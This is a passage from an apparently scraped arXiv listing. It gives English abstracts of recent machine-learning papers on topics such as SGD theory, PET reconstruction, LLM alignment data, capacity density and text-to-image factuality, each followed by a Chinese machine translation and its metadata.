Stochastic gradient descent is a classic algorithm that has gained great popularity especially in the last decades as the most common approach for training models in machine learning. While the algorithm has been well-studied when stochastic gradients are assumed to have a finite variance, there is significantly less research addressing its theoretical properties in the case of infinite variance gradients. In this paper, we establish the asymptotic behavior of stochastic gradient descent in the context of infinite variance stochastic gradients, assuming that the stochastic gradient is regular varying with index $\alpha\in(1,2)$. The closest result in this context was established in 1969 , in the one-dimensional case and assuming that stochastic gradients belong to a more restrictive class of distributions. We extend it to the multidimensional case, covering a broader class of infinite variance distributions. As we show, the asymptotic distribution of the stochastic gradient descent algorithm can be characterized as the stationary distribution of a suitably defined Ornstein-Uhlenbeck process driven by an appropriate stable L\'evy process. Additionally, we explore the applications of these results in linear regression and logistic regression models.
Updated: 2024-12-05 17:03:34
标题: 随机梯度下降在方差无穷大情况下的极限定理
摘要: 随机梯度下降是一种经典算法,在过去几十年中特别受欢迎,作为机器学习中训练模型的最常见方法。尽管在假定随机梯度具有有限方差时,该算法已经得到深入研究,但在无限方差梯度的情况下,对其理论性质的研究明显较少。本文在假设随机梯度为指数$\alpha\in(1,2)$的正则变化的情况下,建立了随机梯度下降在无限方差随机梯度背景下的渐近行为。在这一背景下,最接近的结果是在1969年建立的,仅限于一维情况,并假设随机梯度属于更严格的分布类别。我们将其扩展到多维情况,涵盖了更广泛的无限方差分布类别。正如我们所展示的,随机梯度下降算法的渐近分布可以被描述为由适当的稳定Lévy过程驱动的适当定义的Ornstein-Uhlenbeck过程的稳态分布。此外,我们探讨了这些结果在线性回归和逻辑回归模型中的应用。
更新时间: 2024-12-05 17:03:34
领域: stat.ML,cs.LG,math.PR
RMD: A Simple Baseline for More General Human Motion Generation via Training-free Retrieval-Augmented Motion Diffuse
While motion generation has made substantial progress, its practical application remains constrained by dataset diversity and scale, limiting its ability to handle out-of-distribution scenarios. To address this, we propose a simple and effective baseline, RMD, which enhances the generalization of motion generation through retrieval-augmented techniques. Unlike previous retrieval-based methods, RMD requires no additional training and offers three key advantages: (1) the external retrieval database can be flexibly replaced; (2) body parts from the motion database can be reused, with an LLM facilitating splitting and recombination; and (3) a pre-trained motion diffusion model serves as a prior to improve the quality of motions obtained through retrieval and direct combination. Without any training, RMD achieves state-of-the-art performance, with notable advantages on out-of-distribution data.
Updated: 2024-12-05 17:01:09
标题: RMD:通过无需训练的检索增强运动扩散实现更普遍的人类动作生成的简单基准
摘要: 尽管动作生成取得了实质性进展,但其实际应用仍受限于数据集的多样性和规模,限制了其处理超出分布情景的能力。为了解决这一问题,我们提出了一个简单而有效的基线模型RMD,通过检索增强技术提高动作生成的泛化能力。与先前的基于检索的方法不同,RMD无需额外训练,并提供三个关键优势:(1)外部检索数据库可以灵活替换;(2)可以重复使用来自动作数据库的身体部位,LLM有助于分割和重组;以及(3)预训练的动作扩散模型作为先验,提高通过检索和直接组合获得的动作质量。在没有任何训练的情况下,RMD实现了最先进的性能,在超出分布数据上具有显著优势。
更新时间: 2024-12-05 17:01:09
领域: cs.CV,cs.AI,cs.GR
Retrieval-Augmented Machine Translation with Unstructured Knowledge
Retrieval-augmented generation (RAG) introduces additional information to enhance large language models (LLMs). In machine translation (MT), previous work typically retrieves in-context examples from paired MT corpora, or domain-specific knowledge from knowledge graphs, to enhance models' MT ability. However, a large amount of world knowledge is organized in unstructured documents, and might not be fully paired across different languages. In this paper, we study retrieval-augmented MT using unstructured documents. Specifically, we build RAGtrans, the first benchmark to train and evaluate LLMs' retrieval-augmented MT ability. RAGtrans contains 79K MT samples collected via GPT-4o and human translators. Besides, documents from different languages are also provided to supply the knowledge to these samples. Based on RAGtrans, we further propose a multi-task training method to teach LLMs how to use information from multilingual documents during their translation. The method uses existing multilingual corpora to create auxiliary training objectives without additional labeling requirements. Extensive experiments show that the method improves LLMs by 1.58-3.09 BLEU and 1.00-2.03 COMET scores.
Updated: 2024-12-05 17:00:32
标题: 检索增强的机器翻译与非结构化知识
摘要: 检索增强生成(RAG)引入额外信息以增强大型语言模型(LLM)。在机器翻译(MT)中,先前的工作通常从配对的MT语料库中检索上下文示例,或从知识图中检索领域特定知识,以增强模型的MT能力。然而,大量的世界知识是以非结构化文档的形式组织的,并且可能在不同语言之间并非完全配对。在本文中,我们研究了使用非结构化文档进行检索增强的MT。具体来说,我们构建了RAGtrans,这是第一个用于训练和评估LLM的检索增强MT能力的基准。RAGtrans包含通过GPT-4o和人类翻译者收集的79K个MT样本。此外,还提供了来自不同语言的文档,以为这些样本提供知识。基于RAGtrans,我们进一步提出了一种多任务训练方法,教导LLM如何在翻译过程中使用多语文档中的信息。该方法利用现有的多语言语料库创建辅助训练目标,无需额外的标记要求。大量实验证明,该方法提高了LLM的1.58-3.09 BLEU和1.00-2.03 COMET得分。
更新时间: 2024-12-05 17:00:32
领域: cs.CL,cs.AI
Likelihood-Scheduled Score-Based Generative Modeling for Fully 3D PET Image Reconstruction
Medical image reconstruction with pre-trained score-based generative models (SGMs) has advantages over other existing state-of-the-art deep-learned reconstruction methods, including improved resilience to different scanner setups and advanced image distribution modeling. SGM-based reconstruction has recently been applied to simulated positron emission tomography (PET) datasets, showing improved contrast recovery for out-of-distribution lesions relative to the state-of-the-art. However, existing methods for SGM-based reconstruction from PET data suffer from slow reconstruction, burdensome hyperparameter tuning and slice inconsistency effects (in 3D). In this work, we propose a practical methodology for fully 3D reconstruction that accelerates reconstruction and reduces the number of critical hyperparameters by matching the likelihood of an SGM's reverse diffusion process to a current iterate of the maximum-likelihood expectation maximization algorithm. Using the example of low-count reconstruction from simulated $[^{18}$F]DPA-714 datasets, we show our methodology can match or improve on the NRMSE and SSIM of existing state-of-the-art SGM-based PET reconstruction while reducing reconstruction time and the need for hyperparameter tuning. We evaluate our methodology against state-of-the-art supervised and conventional reconstruction algorithms. Finally, we demonstrate a first-ever implementation of SGM-based reconstruction for real 3D PET data, specifically $[^{18}$F]DPA-714 data, where we integrate perpendicular pre-trained SGMs to eliminate slice inconsistency issues.
Updated: 2024-12-05 16:58:45
标题: 可能性调度得分基础生成建模用于完全3D PET图像重建
摘要: 使用预训练的基于分数的生成模型(SGMs)进行医学图像重建比其他现有的最先进的深度学习重建方法具有优势,包括对不同扫描仪设置和先进图像分布建模的改进韧性。最近,SGM基础的重建已应用于模拟正电子发射断层扫描(PET)数据集,相对于最先进技术,显示出对分布外病变的对比度恢复的改善。然而,现有的基于PET数据的SGM重建方法存在重建缓慢、繁琐的超参数调整和切片不一致性效应(在3D中)的问题。在这项工作中,我们提出了一种完全3D重建的实用方法论,通过将SGM的逆扩散过程的似然性与最大似然期望最大化算法的当前迭代进行匹配,加速重建并减少关键超参数的数量。通过使用模拟的$[^{18}$F]DPA-714数据集中的低计数重建的示例,我们展示了我们的方法可以与或优于现有最先进的SGM基础PET重建的NRMSE和SSIM,同时减少重建时间和超参数调整的需求。我们将我们的方法与最先进的监督和传统重建算法进行评估。最后,我们展示了SGM基础的重建首次在真实3D PET数据中的实施,特别是$[^{18}$F]DPA-714数据,其中我们整合了垂直预训练的SGMs以消除切片不一致性问题。
更新时间: 2024-12-05 16:58:45
领域: physics.med-ph,cs.CV,cs.LG
Action Mapping for Reinforcement Learning in Continuous Environments with Constraints
Deep reinforcement learning (DRL) has had success across various domains, but applying it to environments with constraints remains challenging due to poor sample efficiency and slow convergence. Recent literature explored incorporating model knowledge to mitigate these problems, particularly through the use of models that assess the feasibility of proposed actions. However, integrating feasibility models efficiently into DRL pipelines in environments with continuous action spaces is non-trivial. We propose a novel DRL training strategy utilizing action mapping that leverages feasibility models to streamline the learning process. By decoupling the learning of feasible actions from policy optimization, action mapping allows DRL agents to focus on selecting the optimal action from a reduced feasible action set. We demonstrate through experiments that action mapping significantly improves training performance in constrained environments with continuous action spaces, especially with imperfect feasibility models.
Updated: 2024-12-05 16:42:45
标题: 在具有约束条件的连续环境中的强化学习的动作映射
摘要: 深度强化学习(DRL)在各个领域取得了成功,但将其应用于具有约束条件的环境仍然具有挑战性,这是由于样本效率低和收敛速度慢。最近的文献探讨了通过整合模型知识来缓解这些问题,特别是通过使用评估提议动作的可行性的模型。然而,在具有连续动作空间的环境中有效地将可行性模型整合到DRL管道中是非常困难的。我们提出了一种利用动作映射的新颖DRL训练策略,利用可行性模型来简化学习过程。通过将可行动作的学习与策略优化分离,动作映射允许DRL代理集中于从减少的可行动作集中选择最佳动作。通过实验证明,动作映射在具有连续动作空间的约束环境中显著提高了训练性能,尤其是在存在不完善的可行性模型的情况下。
更新时间: 2024-12-05 16:42:45
领域: cs.LG,cs.AI,cs.SY,eess.SY
Learning in Wilson-Cowan model for metapopulation
The Wilson-Cowan model for metapopulation, a Neural Mass Network Model, treats different subcortical regions of the brain as connected nodes, with connections representing various types of structural, functional, or effective neuronal connectivity between these regions. Each region comprises interacting populations of excitatory and inhibitory cells, consistent with the standard Wilson-Cowan model. By incorporating stable attractors into such a metapopulation model's dynamics, we transform it into a learning algorithm capable of achieving high image and text classification accuracy. We test it on MNIST and Fashion MNIST, in combination with convolutional neural networks, on CIFAR-10 and TF-FLOWERS, and, in combination with a transformer architecture (BERT), on IMDB, always showing high classification accuracy. These numerical evaluations illustrate that minimal modifications to the Wilson-Cowan model for metapopulation can reveal unique and previously unobserved dynamics.
Updated: 2024-12-05 16:39:32
标题: 《Metapopulation中的Wilson-Cowan模型学习》
摘要: The Wilson-Cowan模型用于元种群的神经质量网络模型,将大脑的不同亚皮层区域视为连接节点,连接表示这些区域之间各种类型的结构、功能或有效的神经元连接。每个区域包括与标准Wilson-Cowan模型一致的兴奋和抑制细胞的相互作用人口。通过将稳定的吸引子纳入这种元种群模型的动力学中,我们将其转化为一种能够实现高图像和文本分类准确性的学习算法。我们在MNIST和Fashion MNIST上进行了测试,与卷积神经网络相结合,在CIFAR-10和TF-FLOWERS上进行了测试,并与变压器结构(BERT)结合在IMDB上进行了测试,始终显示高分类准确性。这些数值评估表明,对于元种群的Wilson-Cowan模型进行最小修改可以揭示独特且以前未观察到的动态。
更新时间: 2024-12-05 16:39:32
领域: q-bio.NC,cond-mat.dis-nn,cond-mat.stat-mech,cs.AI,cs.NE
GRAM: Generalization in Deep RL with a Robust Adaptation Module
The reliable deployment of deep reinforcement learning in real-world settings requires the ability to generalize across a variety of conditions, including both in-distribution scenarios seen during training as well as novel out-of-distribution scenarios. In this work, we present a framework for dynamics generalization in deep reinforcement learning that unifies these two distinct types of generalization within a single architecture. We introduce a robust adaptation module that provides a mechanism for identifying and reacting to both in-distribution and out-of-distribution environment dynamics, along with a joint training pipeline that combines the goals of in-distribution adaptation and out-of-distribution robustness. Our algorithm GRAM achieves strong generalization performance across in-distribution and out-of-distribution scenarios upon deployment, which we demonstrate on a variety of realistic simulated locomotion tasks with a quadruped robot.
Updated: 2024-12-05 16:39:01
标题: GRAM: 具有稳健适应模块的深度强化学习中的泛化
摘要: 在现实世界中可靠地部署深度强化学习需要能够在各种条件下进行泛化,包括在训练过程中看到的分布场景以及新颖的非分布场景。在这项工作中,我们提出了一个用于深度强化学习中动态泛化的框架,将这两种不同类型的泛化统一到单一架构中。我们引入了一个稳健的适应模块,提供了一种识别和应对分布和非分布环境动态的机制,以及一个联合训练流水线,结合了分布适应和非分布鲁棒性的目标。我们的算法GRAM在部署后在分布和非分布场景中实现了强大的泛化性能,我们在一个四足机器人上展示了在各种逼真的模拟运动任务中的表现。
更新时间: 2024-12-05 16:39:01
领域: cs.LG,cs.AI,cs.RO,stat.ML
A Fisher-Rao gradient flow for entropy-regularised Markov decision processes in Polish spaces
We study the global convergence of a Fisher-Rao policy gradient flow for infinite-horizon entropy-regularised Markov decision processes with Polish state and action space. The flow is a continuous-time analogue of a policy mirror descent method. We establish the global well-posedness of the gradient flow and demonstrate its exponential convergence to the optimal policy. Moreover, we prove the flow is stable with respect to gradient evaluation, offering insights into the performance of a natural policy gradient flow with log-linear policy parameterisation. To overcome challenges stemming from the lack of the convexity of the objective function and the discontinuity arising from the entropy regulariser, we leverage the performance difference lemma and the duality relationship between the gradient and mirror descent flows. Our analysis provides a theoretical foundation for developing various discrete policy gradient algorithms.
Updated: 2024-12-05 16:35:46
标题: 一个用于熵正则化马尔可夫决策过程的Fisher-Rao梯度流在波兰空间中
摘要: 我们研究了针对拥有波兰状态和行动空间的无限时间跨度熵正则化马尔可夫决策过程的Fisher-Rao策略梯度流的全局收敛性。该流是策略镜像下降方法的连续时间类比。我们建立了梯度流的全局良态性,并展示了它对最佳策略的指数收敛。此外,我们证明了该流在梯度评估方面的稳定性,为自然策略梯度流与对数线性策略参数化的性能提供了洞见。为了克服目标函数的非凸性以及由熵正则化器引起的不连续性所带来的挑战,我们利用了性能差异引理和梯度与镜像下降流之间的对偶关系。我们的分析为开发各种离散策略梯度算法提供了理论基础。
更新时间: 2024-12-05 16:35:46
领域: math.OC,cs.LG,math.PR,90C40, 93E20, 90C26, 60B05, 90C53
Generative-Model-Based Fully 3D PET Image Reconstruction by Conditional Diffusion Sampling
Score-based generative models (SGMs) have recently shown promising results for image reconstruction on simulated positron emission tomography (PET) datasets. In this work we have developed and implemented practical methodology for 3D image reconstruction with SGMs, and perform (to our knowledge) the first SGM-based reconstruction of real fully 3D PET data. We train an SGM on full-count reference brain images, and extend methodology to allow SGM-based reconstructions at very low counts (1% of original, to simulate low-dose or short-duration scanning). We then perform reconstructions for multiple independent realisations of 1% count data, allowing us to analyse the bias and variance characteristics of the method. We sample from the learned posterior distribution of the generative algorithm to calculate uncertainty images for our reconstructions. We evaluate the method's performance on real full- and low-count PET data and compare with conventional OSEM and MAP-EM baselines, showing that our SGM-based low-count reconstructions match full-dose reconstructions more closely and in a bias-variance trade-off comparison, our SGM-reconstructed images have lower variance than existing baselines. Future work will compare to supervised deep-learned methods, with other avenues for investigation including how data conditioning affects the SGM's posterior distribution and the algorithm's performance with different tracers.
Updated: 2024-12-05 16:35:43
标题: 生成模型为基础的基于条件扩散采样的完全三维PET图像重建
摘要: 基于分数的生成模型(SGMs)最近在模拟正电子发射断层扫描(PET)数据集上显示出有希望的图像重建结果。在这项工作中,我们开发并实施了实用的方法论,用于使用SGMs进行3D图像重建,并(据我们所知)首次基于SGM对真实的完全3D PET数据进行重建。我们在完整计数的参考脑图像上训练了一个SGM,并扩展了方法,以允许基于SGM的重建在非常低计数(原始计数的1%,以模拟低剂量或短时间扫描)下进行。然后,我们对多个独立的1%计数数据实现进行重建,从而能够分析该方法的偏差和方差特性。我们从生成算法的学习后验分布中抽样,以计算我们的重建的不确定性图像。我们评估了该方法在真实的完整计数和低计数PET数据上的性能,并与传统的OSEM和MAP-EM基线进行比较,显示出我们基于SGM的低计数重建更接近完整计数重建,在偏差-方差权衡比较中,我们的SGM重建图像的方差低于现有基线。未来工作将与监督式深度学习方法进行比较,其他研究途径包括数据条件如何影响SGM的后验分布以及算法在不同示踪剂下的性能。
更新时间: 2024-12-05 16:35:43
领域: physics.med-ph,cs.CV,cs.LG
Enhancing Novel Object Detection via Cooperative Foundational Models
In this work, we address the challenging and emergent problem of novel object detection (NOD), focusing on the accurate detection of both known and novel object categories during inference. Traditional object detection algorithms are inherently closed-set, limiting their capability to handle NOD. We present a novel approach to transform existing closed-set detectors into open-set detectors. This transformation is achieved by leveraging the complementary strengths of pre-trained foundational models, specifically CLIP and SAM, through our cooperative mechanism. Furthermore, by integrating this mechanism with state-of-the-art open-set detectors such as GDINO, we establish new benchmarks in object detection performance. Our method achieves 17.42 mAP in novel object detection and 42.08 mAP for known objects on the challenging LVIS dataset. Adapting our approach to the COCO OVD split, we surpass the current state-of-the-art by a margin of 7.2 $ \text{AP}_{50} $ for novel classes. Our code is available at https://rohit901.github.io/coop-foundation-models/ .
Updated: 2024-12-05 16:34:21
标题: 通过合作基础模型提升新物体检测
摘要: 在这项工作中,我们解决了新颖目标检测(NOD)这一具有挑战性和紧迫性的问题,重点关注在推理过程中准确检测已知和新颖对象类别。传统的目标检测算法在本质上是封闭集的,限制了处理NOD的能力。我们提出了一种新颖的方法,将现有的封闭集检测器转换为开放集检测器。通过利用预训练的基础模型,特别是CLIP和SAM,通过我们的合作机制,实现了这种转换。此外,通过将这种机制与最先进的开放集检测器(如GDINO)集成,我们在目标检测性能方面建立了新的基准。我们的方法在具有挑战性的LVIS数据集上实现了17.42 mAP的新颖目标检测和42.08 mAP的已知对象检测。将我们的方法调整到COCO OVD分割,我们超过了当前最先进技术7.2个AP50的新颖类别。我们的代码可在https://rohit901.github.io/coop-foundation-models/中找到。
更新时间: 2024-12-05 16:34:21
领域: cs.CV,cs.AI,cs.LG
The Hyperfitting Phenomenon: Sharpening and Stabilizing LLMs for Open-Ended Text Generation
This paper introduces the counter-intuitive generalization results of overfitting pre-trained large language models (LLMs) on very small datasets. In the setting of open-ended text generation, it is well-documented that LLMs tend to generate repetitive and dull sequences, a phenomenon that is especially apparent when generating using greedy decoding. This issue persists even with state-of-the-art LLMs containing billions of parameters, trained via next-token prediction on large datasets. We find that by further fine-tuning these models to achieve a near-zero training loss on a small set of samples -- a process we refer to as hyperfitting -- the long-sequence generative capabilities are greatly enhanced. Greedy decoding with these Hyperfitted models even outperform Top-P sampling over long-sequences, both in terms of diversity and human preferences. This phenomenon extends to LLMs of various sizes, different domains, and even autoregressive image generation. We further find this phenomena to be distinctly different from that of Grokking and double descent. Surprisingly, our experiments indicate that hyperfitted models rarely fall into repeating sequences they were trained on, and even explicitly blocking these sequences results in high-quality output. All hyperfitted models produce extremely low-entropy predictions, often allocating nearly all probability to a single token.
Updated: 2024-12-05 16:34:20
标题: 超拟合现象:为开放式文本生成锐化和稳定化LLMs
摘要: 这篇论文介绍了在非常小的数据集上对过度拟合预训练大型语言模型(LLMs)的反直觉概括结果。在开放式文本生成的情况下,众所周知,LLMs倾向于生成重复和乏味的序列,特别是在使用贪婪解码时尤为明显。即使使用包含数十亿参数、通过大型数据集上的下一个标记预测进行训练的最先进的LLMs,这个问题仍然存在。我们发现,通过进一步微调这些模型,使其在一小组样本上实现接近零的训练损失——这个过程我们称为超拟合——长序列生成能力得到极大增强。使用这些超拟合模型的贪婪解码甚至在长序列上表现优于Top-P抽样,无论是在多样性还是人类偏好方面。这种现象适用于各种大小、不同领域甚至自回归图像生成的LLMs。我们进一步发现,这种现象与Grokking和双峰现象有着明显不同。令人惊讶的是,我们的实验表明,超拟合模型很少陷入它们训练过的重复序列中,甚至明确阻止这些序列也会产生高质量的输出。所有超拟合模型产生极低熵的预测,通常将几乎所有概率分配给一个单独的标记。
更新时间: 2024-12-05 16:34:20
领域: cs.CL,cs.AI
Densing Law of LLMs
Large Language Models (LLMs) have emerged as a milestone in artificial intelligence, and their performance can improve as the model size increases. However, this scaling brings great challenges to training and inference efficiency, particularly for deploying LLMs in resource-constrained environments, and the scaling trend is becoming increasingly unsustainable. This paper introduces the concept of ``\textit{capacity density}'' as a new metric to evaluate the quality of the LLMs across different scales and describes the trend of LLMs in terms of both effectiveness and efficiency. To calculate the capacity density of a given target LLM, we first introduce a set of reference models and develop a scaling law to predict the downstream performance of these reference models based on their parameter sizes. We then define the \textit{effective parameter size} of the target LLM as the parameter size required by a reference model to achieve equivalent performance, and formalize the capacity density as the ratio of the effective parameter size to the actual parameter size of the target LLM. Capacity density provides a unified framework for assessing both model effectiveness and efficiency. Our further analysis of recent open-source base LLMs reveals an empirical law (the densing law)that the capacity density of LLMs grows exponentially over time. More specifically, using some widely used benchmarks for evaluation, the capacity density of LLMs doubles approximately every three months. The law provides new perspectives to guide future LLM development, emphasizing the importance of improving capacity density to achieve optimal results with minimal computational overhead.
Updated: 2024-12-05 16:31:13
标题: LLMs的Densing法则
摘要: 大型语言模型(LLMs)已经成为人工智能领域的一个里程碑,随着模型规模的增加,它们的性能也会提高。然而,这种扩展给训练和推理效率带来了巨大挑战,尤其是在资源受限的环境中部署LLMs时,而且这种扩展趋势变得越来越不可持续。本文引入了“容量密度”概念作为一个新的评估LLMs质量的指标,描述了LLMs在效果和效率方面的趋势。为了计算给定目标LLM的容量密度,我们首先引入一组参考模型,并制定一个缩放定律来预测这些参考模型的下游性能,基于它们的参数大小。然后,我们将目标LLM的“有效参数大小”定义为参考模型所需的参数大小,以实现等效性能,并将容量密度形式化为有效参数大小与目标LLM的实际参数大小的比率。容量密度提供了一个统一的框架,用于评估模型的效果和效率。我们对最近开源基础LLMs的进一步分析揭示了一个经验规律(密集定律),即LLMs的容量密度随时间呈指数增长。更具体地说,使用一些广泛使用的基准进行评估,LLMs的容量密度大约每三个月翻倍一次。这一规律为指导未来LLM的发展提供了新的视角,强调提高容量密度的重要性,以实现最佳结果并最小化计算开销。
更新时间: 2024-12-05 16:31:13
领域: cs.AI,cs.CL
The Tile: A 2D Map of Ranking Scores for Two-Class Classification
In the computer vision and machine learning communities, as well as in many other research domains, rigorous evaluation of any new method, including classifiers, is essential. One key component of the evaluation process is the ability to compare and rank methods. However, ranking classifiers and accurately comparing their performances, especially when taking application-specific preferences into account, remains challenging. For instance, commonly used evaluation tools like Receiver Operating Characteristic (ROC) and Precision/Recall (PR) spaces display performances based on two scores. Hence, they are inherently limited in their ability to compare classifiers across a broader range of scores and lack the capability to establish a clear ranking among classifiers. In this paper, we present a novel versatile tool, named the Tile, that organizes an infinity of ranking scores in a single 2D map for two-class classifiers, including common evaluation scores such as the accuracy, the true positive rate, the positive predictive value, Jaccard's coefficient, and all F-beta scores. Furthermore, we study the properties of the underlying ranking scores, such as the influence of the priors or the correspondences with the ROC space, and depict how to characterize any other score by comparing them to the Tile. Overall, we demonstrate that the Tile is a powerful tool that effectively captures all the rankings in a single visualization and allows interpreting them.
Updated: 2024-12-05 16:27:59
标题: 标题翻译:瓷砖:用于两类分类排名分数的二维地图
摘要: 在计算机视觉和机器学习社区,以及许多其他研究领域中,对于任何新方法的严格评估,包括分类器,都是至关重要的。评估过程的一个关键组成部分是能够比较和排名方法。然而,排名分类器并准确比较它们的性能,特别是在考虑特定应用偏好时,仍然具有挑战性。例如,常用的评估工具如受试者工作特征曲线(ROC)和精确率/召回率(PR)空间显示基于两个分数的性能。因此,它们在比较更广泛范围的分数时固有地受限,并缺乏在分类器中建立清晰排名的能力。在本文中,我们提出了一种新颖的多功能工具,名为Tile,它将无限数量的排名分数组织在一个单一的二维地图中,适用于两类分类器,包括常见的评估分数,如准确率、真正例率、阳性预测值、Jaccard系数和所有F-beta分数。此外,我们研究了潜在排名分数的属性,如先验的影响或与ROC空间的对应,并描述了如何通过将它们与Tile进行比较来表征任何其他分数。总体而言,我们证明了Tile是一个强大的工具,能够有效地捕捉所有排名在一个单一可视化中并允许对其进行解释。
更新时间: 2024-12-05 16:27:59
领域: cs.CV,cs.LG,cs.PF
ELEMENTAL: Interactive Learning from Demonstrations and Vision-Language Models for Reward Design in Robotics
Reinforcement learning (RL) has demonstrated compelling performance in robotic tasks, but its success often hinges on the design of complex, ad hoc reward functions. Researchers have explored how Large Language Models (LLMs) could enable non-expert users to specify reward functions more easily. However, LLMs struggle to balance the importance of different features, generalize poorly to out-of-distribution robotic tasks, and cannot represent the problem properly with only text-based descriptions. To address these challenges, we propose ELEMENTAL (intEractive LEarning froM dEmoNstraTion And Language), a novel framework that combines natural language guidance with visual user demonstrations to align robot behavior with user intentions better. By incorporating visual inputs, ELEMENTAL overcomes the limitations of text-only task specifications, while leveraging inverse reinforcement learning (IRL) to balance feature weights and match the demonstrated behaviors optimally. ELEMENTAL also introduces an iterative feedback-loop through self-reflection to improve feature, reward, and policy learning. Our experiment results demonstrate that ELEMENTAL outperforms prior work by 42.3% on task success, and achieves 41.3% better generalization in out-of-distribution tasks, highlighting its robustness in LfD.
Updated: 2024-12-05 16:27:08
标题: ELEMENTAL:交互式学习,从演示和视觉-语言模型中为机器人奖励设计。
摘要: 强化学习(RL)在机器人任务中表现出令人信服的性能,但其成功往往取决于复杂、特定的奖励函数的设计。研究人员探索了如何利用大型语言模型(LLMs)使非专业用户更容易指定奖励函数。然而,LLMs很难平衡不同特征的重要性,在分布外的机器人任务中泛化能力差,且无法仅通过文本描述正确表示问题。为了解决这些挑战,我们提出了ELEMENTAL(intEractive LEarning froM dEmoNstraTion And Language),这是一个新颖的框架,结合自然语言引导和视觉用户演示,更好地使机器人行为与用户意图一致。通过整合视觉输入,ELEMENTAL克服了仅有文本任务规范的局限性,同时利用反向强化学习(IRL)来平衡特征权重,并最佳匹配展示的行为。ELEMENTAL还通过自我反思引入了迭代反馈循环,以改进特征、奖励和策略学习。我们的实验结果表明,ELEMENTAL在任务成功率上比先前工作提高了42.3%,在分布外任务中实现了41.3%更好的泛化能力,突显了其在LfD中的稳健性。
更新时间: 2024-12-05 16:27:08
领域: cs.RO,cs.LG
ALMA: Alignment with Minimal Annotation
Recent approaches to large language model (LLM) alignment typically require millions of human annotations or rely on external aligned models for synthetic data generation. This paper introduces ALMA: Alignment with Minimal Annotation, demonstrating that effective alignment can be achieved using only 9,000 labeled examples -- less than 1% of conventional approaches. ALMA generates large amounts of high-quality synthetic alignment data through new techniques: diverse prompt synthesis via few-shot learning, diverse response generation with multiple model checkpoints, and judge (reward model) enhancement through score aggregation and self-distillation. Using only a pretrained Llama3 base model, 5,000 SFT examples, and 4,000 judge annotations, ALMA achieves performance close to Llama3-Instruct across diverse alignment benchmarks (e.g., 0.1% difference on AlpacaEval 2.0 score). These results are achieved with a multi-round, self-bootstrapped data synthesis and training recipe that continues to improve for 10 rounds, surpassing the typical 3-round ceiling of previous methods. These results suggest that base models already possess sufficient knowledge for effective alignment, and that synthetic data generation methods can expose it.
Updated: 2024-12-05 16:26:31
标题: ALMA:最小注释的对齐
摘要: 最近的大型语言模型(LLM)对齐方法通常需要数百万人工注释或依赖外部对齐模型来生成合成数据。本文介绍了ALMA:最小标注对齐,证明只需使用9,000个标记示例即可实现有效对齐,这比传统方法的1%还少。ALMA通过新技术生成大量高质量的合成对齐数据:通过少样本学习实现多样化提示合成,通过多个模型检查点生成多样化回应,通过分数聚合和自蒸馏增强评判(奖励模型)。只使用预训练的Llama3基础模型、5,000个SFT示例和4,000个评判注释,ALMA在各种对齐基准测试中实现了接近Llama3-Instruct的性能(例如,在AlpacaEval 2.0分数上相差0.1%)。这些结果是通过多轮、自引导的数据合成和训练配方实现的,持续改进10轮,超过了先前方法的典型3轮上限。这些结果表明基础模型已经具有足够的知识进行有效对齐,并且合成数据生成方法可以暴露出这些知识。
更新时间: 2024-12-05 16:26:31
领域: cs.CL,cs.LG
HydraViT: Stacking Heads for a Scalable ViT
The architecture of Vision Transformers (ViTs), particularly the Multi-head Attention (MHA) mechanism, imposes substantial hardware demands. Deploying ViTs on devices with varying constraints, such as mobile phones, requires multiple models of different sizes. However, this approach has limitations, such as training and storing each required model separately. This paper introduces HydraViT, a novel approach that addresses these limitations by stacking attention heads to achieve a scalable ViT. By repeatedly changing the size of the embedded dimensions throughout each layer and their corresponding number of attention heads in MHA during training, HydraViT induces multiple subnetworks. Thereby, HydraViT achieves adaptability across a wide spectrum of hardware environments while maintaining performance. Our experimental results demonstrate the efficacy of HydraViT in achieving a scalable ViT with up to 10 subnetworks, covering a wide range of resource constraints. HydraViT achieves up to 5 p.p. more accuracy with the same GMACs and up to 7 p.p. more accuracy with the same throughput on ImageNet-1K compared to the baselines, making it an effective solution for scenarios where hardware availability is diverse or varies over time. Source code available at https://github.com/ds-kiel/HydraViT.
Updated: 2024-12-05 16:24:15
标题: HydraViT:堆叠头部以实现可扩展的ViT
摘要: Vision Transformers(ViTs)的架构,尤其是多头注意力(MHA)机制,对硬件提出了重大要求。在具有不同约束的设备上部署ViTs,如移动电话,需要多个不同大小的模型。然而,这种方法有局限性,比如需要单独训练和存储每个所需的模型。本文介绍了HydraViT,这是一种新颖的方法,通过堆叠注意力头来实现可扩展的ViT,以解决这些局限性。通过在训练过程中反复改变每个层中嵌入维度的大小以及多头注意力(MHA)中的对应注意力头数量,HydraViT引入了多个子网络。因此,HydraViT在保持性能的同时实现了对各种硬件环境的适应性。我们的实验结果表明,HydraViT在实现可扩展的ViT方面表现出了有效性,最多可以覆盖10个子网络,涵盖了广泛的资源约束范围。与基线相比,HydraViT在ImageNet-1K上的准确率提高了高达5个百分点,同时在相同的GMACs下性能提高了7个百分点,这使其成为硬件可用性多样或随时间变化的情况下的有效解决方案。源代码可在https://github.com/ds-kiel/HydraViT上找到。
更新时间: 2024-12-05 16:24:15
领域: cs.CV,cs.AI,cs.LG
T2I-FactualBench: Benchmarking the Factuality of Text-to-Image Models with Knowledge-Intensive Concepts
Evaluating the quality of synthesized images remains a significant challenge in the development of text-to-image (T2I) generation. Most existing studies in this area primarily focus on evaluating text-image alignment, image quality, and object composition capabilities, with comparatively fewer studies addressing the evaluation of the factuality of T2I models, particularly when the concepts involved are knowledge-intensive. To mitigate this gap, we present T2I-FactualBench in this work - the largest benchmark to date in terms of the number of concepts and prompts specifically designed to evaluate the factuality of knowledge-intensive concept generation. T2I-FactualBench consists of a three-tiered knowledge-intensive text-to-image generation framework, ranging from the basic memorization of individual knowledge concepts to the more complex composition of multiple knowledge concepts. We further introduce a multi-round visual question answering (VQA) based evaluation framework to assess the factuality of three-tiered knowledge-intensive text-to-image generation tasks. Experiments on T2I-FactualBench indicate that current state-of-the-art (SOTA) T2I models still leave significant room for improvement.
Updated: 2024-12-05 16:21:01
标题: T2I-FactualBench:使用知识密集型概念对文本到图像模型的事实性进行基准测试
